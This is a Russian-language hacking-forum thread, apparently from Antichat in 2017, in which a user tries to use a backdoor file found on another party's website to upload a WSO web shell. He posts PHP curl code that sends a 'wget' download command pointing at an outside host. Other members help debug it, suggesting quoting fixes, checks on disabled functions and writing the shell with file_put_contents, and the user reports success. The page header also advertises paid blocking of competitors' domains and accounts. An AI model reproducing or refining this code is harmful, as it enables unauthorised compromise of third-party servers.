УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Песочница
Отправка файла пост запросом

Опции темы

Поиск в этой теме

Опции просмотра

27.09.2017, 19:49

tagnohilori

Guest

Сообщений: n/a

Провел на форуме:
1171

Репутация: 0

Добрый день , нашёл один сайт на котором лежит файл с таким содержимым:

.SpoilerTarget" type="button">Spoiler: Code1

Я создал на своём сервере файл .php и загрузил в него форму curl с отправкой файла:

.SpoilerTarget" type="button">Spoiler: Code2
ass');

$codec = system("wget -b -P /var/www/ku/data/www/ip_serva_s_failom_code1/app/webroot/ https://ovrload.ru/f/*****.php");

$postdata ="fack=". urlencode(base64_encode($codec));

$headers["Content-Length"]= strlen($postdata);

$headers["User-Agent"]="Curl/1.0";

$headers["Content-Length"]= strlen($postdata);

$headers["User-Agent"]="Curl/1.0";

curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);

curl_setopt($ch, CURLOPT_POSTFIELDS, $postdata);

$res = curl_exec($ch);

curl_close($ch);?>

Пытаюсь отправить пост запрос с загрузкой файла через curl но файл создаётся на моем сервере а не на том ip куда я посылаю запрос.

Авторизацию проходит , поэтому половина кода работает 100%, а POSRFIELDS вместо того что бы выполнятся на его сервере выполняется на моем , поправляете пожалуйста где сделал ошибку , если всё получится с меня 5$ на wmz

Главная задача залить wso через файлик code1

27.09.2017, 20:53

artkar

Guest

Сообщений: n/a

Провел на форуме:
131082

Репутация: 6

Я так думаю надо в $codec = system("wget -b -P /var/www/ku/data/www/ip_serva_s_failom_code1/app/webroot/ https://ovrload.ru/f/*****.php");

после = и до ; взять в кавычки ну и разобраться с экранированием кавычек внутри...

27.09.2017, 21:32

tagnohilori

Guest

Сообщений: n/a

Провел на форуме:
1171

Репутация: 0

Цитата:

Сообщение от artkar

artkar said:
↑
Я так думаю надо в $codec = system("wget -b -P /var/www/ku/data/www/ip_serva_s_failom_code1/app/webroot/
https://ovrload.ru/f/*****.php
");
после = и до ; взять в кавычки ну и разобраться с экранированием кавычек внутри...

Поставил кавычки получаю ошибку 500

27.09.2017, 22:45

artkar

Guest

Сообщений: n/a

Провел на форуме:
131082

Репутация: 6

а почему у тебя пост? Нужно ведь гет?

И попробуй скопировать в папку /logs

27.09.2017, 23:23

blackbox

Guest

Сообщений: n/a

Провел на форуме:
137056

Репутация: 11

Цитата:

Сообщение от tagnohilori

tagnohilori said:
↑
Пытаюсь отправить пост запрос с загрузкой файла через curl но файл создаётся на моем сервере а не на том ip куда я посылаю запрос.
Авторизацию проходит , поэтому половина кода работает 100%, а POSRFIELDS вместо того что бы выполнятся на его сервере выполняется на моем , поправляете пожалуйста где сделал ошибку , если всё получится с меня 5$ на wmz
Главная задача залить wso через файлик code1

Во-первых url должен быть '

Код:

Code:
http://ip_serva_s_failom_code1/get_post.php?key=sdfadsgh4513sdGG435341FDGWWDFGDFHDFGDSFGDFSGDFG'

;

Во-вторых, строка запроса должна быть в таком виде:

Код:

Code:
$codec = 'system("wget -b -P /var/www/ku/data/www/ip_serva_s_failom_code1/app/webroot/ https://ovrload.ru/f/*****.php");'

, то есть как правильно уже сказал в кавычках. Если system не работает (возможно она отключена), то можно попробовать напрямую записать вебшелл через, например, file_put_contents. И да, нужно проверить есть ли права на запись в нужной папке, так же через php все это можно сделать.

28.09.2017, 00:21

tagnohilori

Guest

Сообщений: n/a

Провел на форуме:
1171

Репутация: 0

Цитата:

Сообщение от blackbox

blackbox said:
↑
Во-первых url должен быть '

Код:

Code:
http://ip_serva_s_failom_code1/get_post.php?key=sdfadsgh4513sdGG435341FDGWWDFGDFHDFGDSFGDFSGDFG'

;
Во-вторых, строка запроса должна быть в таком виде:

Код:

Code:
$codec = 'system("wget -b -P /var/www/ku/data/www/ip_serva_s_failom_code1/app/webroot/ https://ovrload.ru/f/*****.php");'

Ничего не помогло , просто ничего не происходит , тестирую на 2х своих серверах , шелл который по идее должен скачается на сервер не скачивается

28.09.2017, 00:29

blackbox

Guest

Сообщений: n/a

Провел на форуме:
137056

Репутация: 11

Цитата:

Сообщение от tagnohilori

tagnohilori said:
↑
Ничего не помогло , просто ничего не происходит , тестирую на 2х своих серверах , шелл который по идее должен скачается на сервер не скачивается

Нужно посмотреть, не отключена ли функция system:

Код:

Code:
$codec = 'есho ini_get("disable_functions");'

И в коде отсылки запроса добавить вывод:

Код:

Code:
$res = curl_exec($ch);
echo $res;

28.09.2017, 00:47

tagnohilori

Guest

Сообщений: n/a

Провел на форуме:
1171

Репутация: 0

Цитата:

Сообщение от blackbox

blackbox said:
↑
Нужно посмотреть, не отключена ли функция system:

Код:

Code:
$codec = 'есho ini_get("disable_functions");'

И в коде отсылки запроса добавить вывод:

Код:

Code:
$res = curl_exec($ch);
echo $res;

Просто пустой экран , у тебя есть телеграмм ? Или скайп

Ps. Все получилось , в конце $codec надо было поставить ....php");'; как-то так , и обращаться к key,

Твой ответ мне помог напиши свой wmz в лс

28.09.2017, 01:08

blackbox

Guest

Сообщений: n/a

Провел на форуме:
137056

Репутация: 11

Цитата:

Сообщение от tagnohilori

tagnohilori said:
↑
Просто пустой экран , у тебя есть телеграмм ? Или скайп
Ps. Все получилось , в конце $codec надо было поставить ....php");'; как-то так , и обращаться к key,
Твой ответ мне помог напиши свой wmz в лс

Рад что помог, wmz оставь себе на мороженое.